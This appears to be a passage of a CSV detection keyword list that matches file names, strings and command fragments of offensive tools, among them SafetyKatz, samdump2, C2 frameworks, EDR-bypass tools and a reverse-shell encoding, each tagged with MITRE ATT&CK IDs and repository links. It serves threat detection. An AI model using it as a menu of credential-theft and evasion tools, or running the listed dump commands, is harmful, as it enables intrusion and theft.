Username","s7scan is a tool that scans networks. enumerates Siemens PLCs and gathers basic information about them. such as PLC firmware and hardwaare version. network configuration and security parameters. It is completely written on Python.","T1046 - T1018 - T1049 - T1040 - T1016 - T1057","TA0043 - TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/klsecservices/s7scan","1","1","N/A","N/A","2","126","45","2018-12-28T12:11:56Z","2018-10-12T08:52:04Z" "*sa7mon/S3Scanner*",".{0,1000}sa7mon\/S3Scanner.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","8","10","2388","357","2024-04-19T12:43:19Z","2017-06-19T22:14:21Z" "*SaadAhla/dropper*",".{0,1000}SaadAhla\/dropper.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","1","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*SaadAhla/UnhookingPatch*",".{0,1000}SaadAhla\/UnhookingPatch.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","1","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*SABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4A*",".{0,1000}SABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4A.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","N/A","9","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*sadshade/veeam-creds*",".{0,1000}sadshade\/veeam\-creds.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" "*safari_in_operator_side_effect.*",".{0,1000}safari_in_operator_side_effect\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*safari_proxy_object_type_confusion.*",".{0,1000}safari_proxy_object_type_confusion\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*SafeBreach-Labs/EDRaser*",".{0,1000}SafeBreach\-Labs\/EDRaser.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "*SafeBreach-Labs/PoolParty*",".{0,1000}SafeBreach\-Labs\/PoolParty.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*safetydump*",".{0,1000}safetydump.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*safetydump.ninja*",".{0,1000}safetydump\.ninja.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*safetydump.ninja*",".{0,1000}safetydump\.ninja.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*SafetyKatz.csproj*",".{0,1000}SafetyKatz\.csproj.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1156","236","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" "*SafetyKatz.exe*",".{0,1000}SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*SafetyKatz.exe*",".{0,1000}SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*SafetyKatz.exe*",".{0,1000}SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1156","236","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" "*SafetyKatz.exe*",".{0,1000}SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SafetyKatz.json*",".{0,1000}SafetyKatz\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*SafetyKatz.Program*",".{0,1000}SafetyKatz\.Program.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SafetyKatz.sln*",".{0,1000}SafetyKatz\.sln.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1156","236","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" "*safetykatz.txt*",".{0,1000}safetykatz\.txt.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SafetyKatzManager*",".{0,1000}SafetyKatzManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SafetyKatz-master*",".{0,1000}SafetyKatz\-master.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1156","236","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" "*sailay1996*",".{0,1000}sailay1996.{0,1000}","offensive_tool_keyword","Github Username","github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/sailay1996","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*sAINT*launch4j.tar.xz*",".{0,1000}sAINT.{0,1000}launch4j\.tar\.xz.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*sAINT\lib\activation.jar*",".{0,1000}sAINT\\lib\\activation\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*saint-1.0-jar-with-dependencies.exe*",".{0,1000}saint\-1\.0\-jar\-with\-dependencies\.exe.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*saint-1.0-jar-with-dependencies.jar*",".{0,1000}saint\-1\.0\-jar\-with\-dependencies\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*Salsa-tools*",".{0,1000}Salsa\-tools.{0,1000}","offensive_tool_keyword","Salsa-tools","Salsa Tools - An AV-Safe Reverse Shell dipped on bellota sauce Salsa Tools is a collection of three different tools that combined. allows you to get a reverse shell on steroids in any Windows environment without even needing PowerShell for its execution. In order to avoid the latest detection techniques (AMSI). most of the components were initially written on C#. Salsa Tools was publicly released by Luis Vacas during his Talk Inmersin en la explotacin tiene rima which took place during h-c0n in 9th February 2019","T1027 - T1036 - T1059 - T1071 - T1073 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/Hackplayers/Salsa-tools","1","0","N/A","N/A","6","572","133","2020-01-31T22:41:35Z","2019-02-04T21:31:28Z" "*SAM hashes extraction failed: *",".{0,1000}SAM\shashes\sextraction\sfailed\:\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*SAM\*-SAMHashes.txt*",".{0,1000}SAM\\.{0,1000}\-SAMHashes\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*SAM\*-SAMHashes.txt*",".{0,1000}SAM\\.{0,1000}\-SAMHashes\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*SAM\.Sam-Full.txt*",".{0,1000}SAM\\\.Sam\-Full\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*sam_the_admin.py*",".{0,1000}sam_the_admin\.py.{0,1000}","offensive_tool_keyword","sam-the-admin","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1208 - T1218.005 - T1055.002","TA0006 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","0","N/A","N/A","10","959","191","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z" "*SamAdduser.exe*",".{0,1000}SamAdduser\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","413","92","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" "*sambaPipe.py*",".{0,1000}sambaPipe\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*samdump(bearer, commands*",".{0,1000}samdump\(bearer,\scommands.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*samdump.exe*",".{0,1000}samdump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*samdump.py*",".{0,1000}samdump\.py.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*samdump.zip*",".{0,1000}samdump\.zip.{0,1000}","offensive_tool_keyword","samdump","Dumping sam","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","1","2","0","2023-04-16T02:15:42Z","2023-04-16T01:49:12Z" "*samdump2 *",".{0,1000}samdump2\s.{0,1000}","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","10","6","N/A","N/A","N/A","N/A" "*samdump2 SYSTEM SAM > *",".{0,1000}samdump2\sSYSTEM\sSAM\s\>\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*samdump2 SYSTEM SAM*",".{0,1000}samdump2\sSYSTEM\sSAM.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","N/A","10","1","56","3","2024-04-19T17:11:22Z","2024-03-05T00:00:20Z" "*samdump2.c*",".{0,1000}samdump2\.c.{0,1000}","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","10","6","N/A","N/A","N/A","N/A" "*sample_brc4.json*",".{0,1000}sample_brc4\.json.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*sample_files/passwd*",".{0,1000}sample_files\/passwd.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*samr_##*",".{0,1000}samr_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*samratashok/nishang*",".{0,1000}samratashok\/nishang.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*samrdump.py*",".{0,1000}samrdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*Sandbox detected - Filename changed :( *",".{0,1000}Sandbox\sdetected\s\-\sFilename\schanged\s\:\(\s.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*sandboxevasion.py*",".{0,1000}sandboxevasion\.py.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","336","85","2024-02-10T13:46:58Z","2022-01-02T22:03:10Z" "*Sandboxie detected!!!*",".{0,1000}Sandboxie\sdetected!!!.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" 